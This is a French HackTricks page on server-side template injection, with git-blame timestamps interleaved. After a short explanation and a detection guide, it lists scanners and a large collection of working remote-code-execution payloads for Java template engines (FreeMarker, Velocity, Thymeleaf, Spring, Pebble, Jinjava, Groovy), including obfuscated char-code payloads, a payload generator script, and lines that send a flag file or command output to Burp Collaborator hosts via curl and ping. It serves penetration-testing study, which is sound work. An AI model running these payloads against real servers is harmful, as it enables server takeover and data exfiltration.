2023-06-03 13:10:46 +00:00
# SSTI (Injection de modèle côté serveur)
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 02:55:29 +00:00
< summary > < strong > Apprenez le piratage AWS de zéro à héros avec< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (Expert en équipe rouge AWS de HackTricks)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-03-16 10:05:23 +00:00
Autres façons de soutenir HackTricks:
2024-01-01 19:54:07 +00:00
2024-03-16 10:05:23 +00:00
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF** , consultez les [**PLANS D'ABONNEMENT** ](https://github.com/sponsors/carlospolop )!
2024-02-05 02:55:29 +00:00
* Obtenez le [**swag officiel PEASS & HackTricks** ](https://peass.creator-spring.com )
* Découvrez [**La famille PEASS** ](https://opensea.io/collection/the-peass-family ), notre collection exclusive de [**NFT** ](https://opensea.io/collection/the-peass-family )
2024-02-23 16:41:03 +00:00
* **Rejoignez le** 💬 [**groupe Discord** ](https://discord.gg/hRep4RUj7f ) ou le [**groupe Telegram** ](https://t.me/peass ) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-04-07 03:54:34 +00:00
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) et [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) dépôts GitHub.
2022-04-28 16:01:33 +00:00
< / details >
2024-04-07 03:54:34 +00:00
< figure > < img src = "../../.gitbook/assets/image (637).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-10-25 15:56:49 +00:00
2024-02-05 02:55:29 +00:00
[**RootedCON** ](https://www.rootedcon.com ) est l'événement de cybersécurité le plus pertinent en **Espagne** et l'un des plus importants en **Europe** . Avec **pour mission de promouvoir les connaissances techniques** , ce congrès est un point de rencontre bouillonnant pour les professionnels de la technologie et de la cybersécurité dans chaque discipline.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2024-02-06 14:26:08 +00:00
## Qu'est-ce que l'injection de modèle côté serveur (SSTI)
2020-07-15 15:43:14 +00:00
2024-02-06 14:26:08 +00:00
L'injection de modèle côté serveur est une vulnérabilité qui se produit lorsqu'un attaquant peut injecter du code malveillant dans un modèle qui est exécuté sur le serveur. Cette vulnérabilité peut être trouvée dans diverses technologies, y compris Jinja.
2020-07-15 15:43:14 +00:00
2024-03-16 10:05:23 +00:00
Jinja est un moteur de modèle populaire utilisé dans les applications web. Considérons un exemple qui illustre un extrait de code vulnérable utilisant Jinja:
2024-02-06 14:26:08 +00:00
```python
output = template.render(name=request.args.get('name'))
2020-07-15 15:43:14 +00:00
```
2024-04-07 03:54:34 +00:00
Dans ce code vulnérable, le paramètre `name` de la requête de l'utilisateur est directement passé dans le modèle en utilisant la fonction `render` . Cela pourrait potentiellement permettre à un attaquant d'injecter du code malveillant dans le paramètre `name` , entraînant une injection de modèle côté serveur.
2020-07-15 15:43:14 +00:00
2024-04-07 03:54:34 +00:00
Par exemple, un attaquant pourrait créer une requête avec une charge utile comme ceci:
2021-10-18 11:21:18 +00:00
```
2024-02-06 14:26:08 +00:00
http://vulnerable-website.com/?name={{bad-stuff-here}}
2020-07-15 15:43:14 +00:00
```
2024-04-07 03:54:34 +00:00
Le payload `{{bad-stuff-here}}` est injecté dans le paramètre `name` . Ce payload peut contenir des directives de modèle Jinja qui permettent à l'attaquant d'exécuter du code non autorisé ou de manipuler le moteur de modèle, potentiellement prenant le contrôle du serveur.
2020-07-15 15:43:14 +00:00
2024-04-07 03:54:34 +00:00
Pour prévenir les vulnérabilités d'injection de modèle côté serveur, les développeurs doivent s'assurer que les entrées utilisateur sont correctement nettoyées et validées avant d'être insérées dans les modèles. Mettre en place une validation des entrées et utiliser des techniques d'échappement conscientes du contexte peut aider à atténuer le risque de cette vulnérabilité.
2020-07-15 15:43:14 +00:00
2024-02-06 14:26:08 +00:00
### Détection
2024-02-23 16:41:03 +00:00
2024-03-29 21:02:51 +00:00
Pour détecter l'injection de modèle côté serveur (SSTI), initialement, **fuzzer le modèle** est une approche directe. Cela implique d'injecter une séquence de caractères spéciaux (**`${{< %[%'"}}%\`**) dans le modèle et d'analyser les différences dans la réponse du serveur entre des données régulières et cette charge spéciale. Les indicateurs de vulnérabilité incluent :
2020-07-15 15:43:14 +00:00
2024-02-23 16:41:03 +00:00
- Des erreurs renvoyées, révélant la vulnérabilité et potentiellement le moteur de modèle.
- Absence de la charge dans la réflexion, ou des parties manquantes, impliquant que le serveur la traite différemment des données régulières.
2024-03-29 21:02:51 +00:00
- **Contexte en texte clair** : Différencier des XSS en vérifiant si le serveur évalue les expressions de modèle (par exemple, `{{7*7}}` , `${7*7}` ).
2024-04-07 03:54:34 +00:00
- **Contexte de code** : Confirmer la vulnérabilité en modifiant les paramètres d'entrée. Par exemple, changer `greeting` dans `http://vulnerable-website.com/?greeting=data.username` pour voir si la sortie du serveur est dynamique ou fixe, comme dans `greeting=data.username}}hello` renvoyant le nom d'utilisateur.
2020-07-15 15:43:14 +00:00
2024-04-07 03:54:34 +00:00
#### Phase d'identification
2020-07-15 15:43:14 +00:00
2024-02-06 14:26:08 +00:00
Identifier le moteur de modèle implique d'analyser les messages d'erreur ou de tester manuellement diverses charges spécifiques à chaque langage. Les charges courantes provoquant des erreurs incluent `${7/0}` , `{{7/0}}` , et `<%= 7/0 %>` . Observer la réponse du serveur aux opérations mathématiques aide à cibler le moteur de modèle spécifique.
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
## Outils
2021-06-25 12:34:30 +00:00
2024-01-01 19:54:07 +00:00
### [TInjA](https://github.com/Hackmanit/TInjA)
2024-02-05 02:55:29 +00:00
un scanner efficace de SSTI + CSTI qui utilise des polyglottes novateurs
2024-01-01 19:54:07 +00:00
```bash
tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
```
2024-01-10 22:21:06 +00:00
### [SSTImap](https://github.com/vladko312/sstimap)
```bash
python3 sstimap.py -i -l 5
2024-03-26 07:59:23 +00:00
python3 sstimap.py -u "http://example.com/" --crawl 5 --forms
python3 sstimap.py -u "https://example.com/page?name=John" -s
2024-01-10 22:21:06 +00:00
```
2022-05-01 13:25:53 +00:00
### [Tplmap](https://github.com/epinna/tplmap)
2021-06-25 12:34:30 +00:00
```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*& comment=supercomment& link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*& comment=A& link" --level 5 -e jade
```
2024-03-29 21:02:51 +00:00
### [Tableau d'injection de modèle](https://github.com/Hackmanit/template-injection-table)
2024-01-01 19:54:07 +00:00
2024-03-29 21:02:51 +00:00
un tableau interactif contenant les polyglottes d'injection de modèle les plus efficaces ainsi que les réponses attendues des 44 moteurs de modèle les plus importants.
2024-01-01 19:54:07 +00:00
2022-05-01 13:25:53 +00:00
## Exploits
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
### Générique
2021-06-27 20:19:16 +00:00
2024-02-05 02:55:29 +00:00
Dans cette **liste de mots** , vous pouvez trouver les **variables définies** dans les environnements de certains des moteurs mentionnés ci-dessous :
2021-06-27 20:19:16 +00:00
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt ](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt )
2024-02-06 14:26:08 +00:00
* [https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt ](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt )
2021-06-27 20:19:16 +00:00
2022-05-01 13:25:53 +00:00
### Java
2021-06-25 12:34:30 +00:00
2024-01-01 19:54:07 +00:00
**Java - Injection de base**
2021-06-25 12:34:30 +00:00
```java
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
2024-02-06 14:26:08 +00:00
// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.
2021-06-25 12:34:30 +00:00
```
2023-06-03 13:10:46 +00:00
**Java - Récupérer les variables d'environnement du système**
2021-06-25 12:34:30 +00:00
```java
${T(java.lang.System).getenv()}
```
2024-01-01 19:54:07 +00:00
**Java - Récupérer /etc/passwd**
2021-06-25 12:34:30 +00:00
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
2022-05-01 13:25:53 +00:00
### FreeMarker (Java)
2020-07-15 15:43:14 +00:00
2024-02-05 02:55:29 +00:00
Vous pouvez essayer vos charges utiles sur [https://try.freemarker.apache.org ](https://try.freemarker.apache.org )
2021-06-25 12:34:30 +00:00
2020-07-15 15:43:14 +00:00
* `{{7*7}} = {{7*7}}`
* `${7*7} = 49`
2024-02-05 02:55:29 +00:00
* `#{7*7} = 49 -- (legacy)`
2023-06-03 13:10:46 +00:00
* `${7*'7'} Rien`
2020-07-15 15:43:14 +00:00
* `${foobar}`
2021-06-25 12:34:30 +00:00
```java
< #assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
2020-07-15 15:43:14 +00:00
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
2024-01-15 10:36:13 +00:00
**Freemarker - Contournement du bac à sable**
2020-07-15 15:43:14 +00:00
2024-02-05 02:55:29 +00:00
⚠️ fonctionne uniquement sur les versions de Freemarker inférieures à 2.3.30
2021-06-25 12:34:30 +00:00
```java
< #assign classloader=article.class.protectionDomain.classLoader>
< #assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
< #assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
< #assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2021-06-25 12:34:30 +00:00
2023-06-03 13:10:46 +00:00
* Dans la section FreeMarker de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Velocity (Java)
2021-06-25 12:34:30 +00:00
```java
2024-03-16 10:05:23 +00:00
// I think this doesn't work
2021-06-25 12:34:30 +00:00
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
2024-03-16 10:05:23 +00:00
// This should work?
#set($s="")
#set($stringClass=$s.getClass())
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("cat%20/flag563378e453.txt"))
#set($out=$process.getInputStream())
#set($null=$process.waitFor() )
#foreach($i+in+[1..$out.available()])
$out.read()
#end
2021-06-25 12:34:30 +00:00
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2021-06-25 12:34:30 +00:00
2023-06-03 13:10:46 +00:00
* Dans la section Velocity de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity )
2020-07-15 15:43:14 +00:00
2024-02-06 14:26:08 +00:00
### Thymeleaf
2020-07-15 15:43:14 +00:00
2024-02-06 14:26:08 +00:00
Dans Thymeleaf, un test courant pour les vulnérabilités SSTI est l'expression `${7*7}` , qui s'applique également à ce moteur de template. Pour une éventuelle exécution de code à distance, des expressions comme celles-ci peuvent être utilisées :
2020-07-15 15:43:14 +00:00
2024-02-23 16:41:03 +00:00
* SpringEL:
2024-02-06 14:26:08 +00:00
```java
${T(java.lang.Runtime).getRuntime().exec('calc')}
```
2024-02-23 16:41:03 +00:00
* OGNL:
2024-02-06 14:26:08 +00:00
```java
${#rt = @java .lang.Runtime@getRuntime(),#rt.exec("calc")}
```
2020-07-15 15:43:14 +00:00
2024-04-07 03:54:34 +00:00
Thymeleaf exige que ces expressions soient placées dans des attributs spécifiques. Cependant, l'_insertion d'expressions_ est prise en charge pour d'autres emplacements de template, en utilisant une syntaxe comme `[[...]]` ou `[(...)]` . Ainsi, un simple payload de test SSTI pourrait ressembler à `[[${7*7}]]` .
2020-07-15 15:43:14 +00:00
2024-04-07 03:54:34 +00:00
Cependant, la probabilité que ce payload fonctionne est généralement faible. La configuration par défaut de Thymeleaf ne prend pas en charge la génération dynamique de templates ; les templates doivent être prédéfinis. Les développeurs devraient implémenter leur propre `TemplateResolver` pour créer des templates à partir de chaînes à la volée, ce qui est rare.
2020-07-15 15:43:14 +00:00
2024-02-09 02:16:20 +00:00
Thymeleaf offre également un _prétraitement des expressions_ , où les expressions entre doubles tirets bas (`__...__`) sont prétraitées. Cette fonctionnalité peut être utilisée dans la construction d'expressions, comme le montre la documentation de Thymeleaf :
2021-06-25 12:34:30 +00:00
```java
2020-07-15 15:43:14 +00:00
#{selection.__${sel.code}__}
```
2024-02-06 14:26:08 +00:00
**Exemple de Vulnérabilité dans Thymeleaf**
Considérez le code suivant, qui pourrait être susceptible à l'exploitation :
```xml
2020-07-15 15:43:14 +00:00
< a th:href = "@{__${path}__}" th:title = "${title}" >
2022-05-18 13:29:23 +00:00
< a th:href = "${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag .txt burpcollab.com')}" th:title = 'pepito' >
2024-02-06 14:26:08 +00:00
```
2024-04-07 03:54:34 +00:00
Cela indique que si le moteur de template traite ces entrées de manière incorrecte, cela pourrait entraîner l'exécution de code à distance en accédant à des URL telles que:
2024-02-06 14:26:08 +00:00
```
2020-07-15 15:43:14 +00:00
http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2020-07-15 15:43:14 +00:00
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ ](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ )
2022-05-18 13:29:23 +00:00
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2024-02-05 02:55:29 +00:00
### Cadre Spring (Java)
2022-09-26 02:13:30 +00:00
```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```
2023-06-03 13:10:46 +00:00
**Contourner les filtres**
2023-01-13 17:40:30 +00:00
2024-02-05 02:55:29 +00:00
Plusieurs expressions de variables peuvent être utilisées, si `${...}` ne fonctionne pas, essayez `#{...}` , `*{...}` , `@{...}` ou `~{...}` .
2023-01-13 17:40:30 +00:00
2023-06-03 13:10:46 +00:00
* Lire `/etc/passwd`
2022-12-30 16:36:06 +00:00
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
2024-01-01 19:54:07 +00:00
* Script personnalisé pour la génération de payload
2022-12-30 16:36:06 +00:00
```python
#!/usr/bin/python3
## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"
from sys import argv
cmd = list(argv[1].strip())
print("Payload: ", cmd , end="\n\n")
converted = [ord(c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
2023-06-25 23:30:13 +00:00
end_payload = '.getInputStream())}'
2022-12-30 16:36:06 +00:00
count = 1
for i in converted:
2023-06-25 23:30:13 +00:00
if count == 1:
base_payload += f"(T(java.lang.Character).toString({i}).concat"
count += 1
elif count == len(converted):
base_payload += f"(T(java.lang.Character).toString({i})))"
else:
base_payload += f"(T(java.lang.Character).toString({i})).concat"
count += 1
2022-12-30 16:36:06 +00:00
print(base_payload + end_payload)
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2023-01-13 17:40:30 +00:00
* [Thymleaf SSTI ](https://javamana.com/2021/11/20211121071046977B.html )
* [Payloads all the things ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd )
2024-02-05 02:55:29 +00:00
### Manipulation de la vue Spring (Java)
2021-06-25 12:34:30 +00:00
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
```
2022-05-18 13:29:23 +00:00
* [https://github.com/veracode-research/spring-view-manipulation ](https://github.com/veracode-research/spring-view-manipulation )
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2020-09-22 09:07:48 +00:00
2022-05-01 13:25:53 +00:00
### Pebble (Java)
2021-06-25 12:34:30 +00:00
* `{{ someString.toUPPERCASE() }}`
2023-07-11 13:30:24 +00:00
Ancienne version de Pebble ( < version 3 . 0 . 9 ) :
2021-06-25 12:34:30 +00:00
```java
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
```
2023-07-11 13:30:24 +00:00
Nouvelle version de Pebble :
2021-06-25 12:34:30 +00:00
```java
2022-02-09 16:22:44 +00:00
{% raw %}
2021-06-25 12:34:30 +00:00
{% set cmd = 'id' %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2023-04-05 23:11:20 +00:00
2023-04-30 21:23:47 +00:00
2024-02-23 16:41:03 +00:00
2024-03-29 21:02:51 +00:00
2021-06-25 12:34:30 +00:00
{% set bytes = (1).TYPE
2023-06-25 23:30:13 +00:00
.forName('java.lang.Runtime')
.methods[6]
.invoke(null,null)
.exec(cmd)
.inputStream
.readAllBytes() %}
2021-06-25 12:34:30 +00:00
{{ (1).TYPE
2023-06-25 23:30:13 +00:00
.forName('java.lang.String')
.constructors[0]
.newInstance(([bytes]).toArray()) }}
2021-06-25 12:34:30 +00:00
```
2022-05-01 13:25:53 +00:00
### Jinjava (Java)
2024-02-05 02:55:29 +00:00
2024-04-07 03:54:34 +00:00
Jinjava est un moteur de template Java qui prend en charge l'injection de template côté serveur (SSTI). Il est utilisé dans divers frameworks Java tels que Spring Boot et Dropwizard. Les attaquants peuvent exploiter les vulnérabilités SSTI pour exécuter du code arbitraire sur le serveur, ce qui peut entraîner des conséquences graves telles que la prise de contrôle complète du serveur. Il est important de sécuriser correctement les applications utilisant Jinjava pour éviter les attaques SSTI.
2021-06-25 12:34:30 +00:00
```java
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
```
2024-02-05 02:55:29 +00:00
**Jinjava - Exécution de commandes**
2021-06-25 12:34:30 +00:00
2023-06-03 13:10:46 +00:00
Corrigé par [https://github.com/HubSpot/jinjava/pull/230 ](https://github.com/HubSpot/jinjava/pull/230 )
2021-06-25 12:34:30 +00:00
```java
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2021-06-25 12:34:30 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava )
2021-06-25 12:34:30 +00:00
2022-05-01 13:25:53 +00:00
### Hubspot - HuBL (Java)
2021-06-26 13:19:42 +00:00
2024-02-05 02:55:29 +00:00
* Délimiteurs d'instructions `{% %}`
* Délimiteurs d'expressions `{{ }}`
* Délimiteurs de commentaires `{# #}`
2022-04-06 08:57:29 +00:00
* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
2021-06-26 13:19:42 +00:00
* `{{'a'.toUpperCase()}}` - "A"
* `{{'a'.concat('b')}}` - "ab"
* `{{'a'.getClass()}}` - java.lang.String
* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
2022-04-06 08:57:29 +00:00
* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
2021-06-26 13:19:42 +00:00
2024-02-05 02:55:29 +00:00
Recherche de "com.hubspot.content.hubl.context.TemplateContextRequest" et découverte du [projet Jinjava sur Github ](https://github.com/HubSpot/jinjava/ ).
2021-06-26 13:19:42 +00:00
```java
{{request.isDebug()}}
//output: False
//Using string 'a' to get an instance of class sun.misc.Launcher
{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}
//output: sun.misc.Launcher@715537d4
//It is also possible to get a new object of the Jinjava class
{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}
//output: com.hubspot.jinjava.JinjavaConfig@78a56797
2023-06-25 23:30:13 +00:00
//It was also possible to call methods on the created object by combining the
2022-04-06 16:21:07 +00:00
2022-04-28 15:47:13 +00:00
2022-04-28 23:27:22 +00:00
2022-04-06 08:57:29 +00:00
{% raw %}
2022-02-09 16:22:44 +00:00
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
2022-04-06 08:57:29 +00:00
{% endraw %}
{{ji.render('{{1*2}}')}}
2021-06-26 13:19:42 +00:00
//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.
//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
//output: xxx
//RCE
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
//output: java.lang.UNIXProcess@1e5f456e
//RCE with org.apache.commons.io.IOUtils.
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//output: netstat execution
//Multiple arguments to the commands
Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
2022-04-06 08:57:29 +00:00
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
2021-06-26 13:19:42 +00:00
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2021-06-26 13:19:42 +00:00
* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html ](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html )
2024-02-05 02:55:29 +00:00
### Langage d'Expression - EL (Java)
2021-06-07 09:30:58 +00:00
2021-06-26 13:24:50 +00:00
* `${"aaaa"}` - "aaaa"
2022-04-05 22:24:52 +00:00
* `${99999+1}` - 100000.
2021-06-26 13:24:50 +00:00
* `#{7*7}` - 49
2021-06-26 14:55:22 +00:00
* `${{7*7}}` - 49
* `${{request}}, ${{session}}, {{faceContext}}`
2021-06-26 13:24:50 +00:00
2024-02-09 02:16:20 +00:00
Le Langage d'Expression (EL) est une fonctionnalité fondamentale qui facilite l'interaction entre la couche de présentation (comme les pages web) et la logique de l'application (comme les beans gérés) en JavaEE. Il est largement utilisé dans de multiples technologies JavaEE pour rationaliser cette communication. Les principales technologies JavaEE utilisant EL incluent :
2024-02-06 14:26:08 +00:00
2024-02-23 16:41:03 +00:00
* **JavaServer Faces (JSF)** : Utilise EL pour lier les composants des pages JSF aux données et actions backend correspondantes.
* **JavaServer Pages (JSP)** : EL est utilisé dans JSP pour accéder et manipuler les données au sein des pages JSP, facilitant la connexion des éléments de la page aux données de l'application.
* **Contexts and Dependency Injection for Java EE (CDI)** : EL s'intègre à CDI pour permettre une interaction transparente entre la couche web et les beans gérés, assurant une structure d'application plus cohérente.
2024-02-06 14:26:08 +00:00
2024-03-26 07:59:23 +00:00
Consultez la page suivante pour en savoir plus sur l'**exploitation des interpréteurs EL** :
2021-06-07 09:30:58 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2021-06-07 09:30:58 +00:00
2022-09-26 09:52:47 +00:00
### Groovy (Java)
2024-04-07 03:54:34 +00:00
Les contournements suivants du gestionnaire de sécurité ont été extraits de ce [**rapport** ](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/ ).
2022-09-26 09:52:47 +00:00
```java
//Basic Payload
import groovy.*;
@groovy .transform.ASTTest(value={
2023-06-25 23:30:13 +00:00
cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
2022-09-26 09:52:47 +00:00
})
def x
//Payload to get output
import groovy.*;
@groovy .transform.ASTTest(value={
2023-06-25 23:30:13 +00:00
cmd = "whoami";
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
2022-09-26 09:52:47 +00:00
})
def x
//Other payloads
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
```
2022-10-25 15:56:49 +00:00
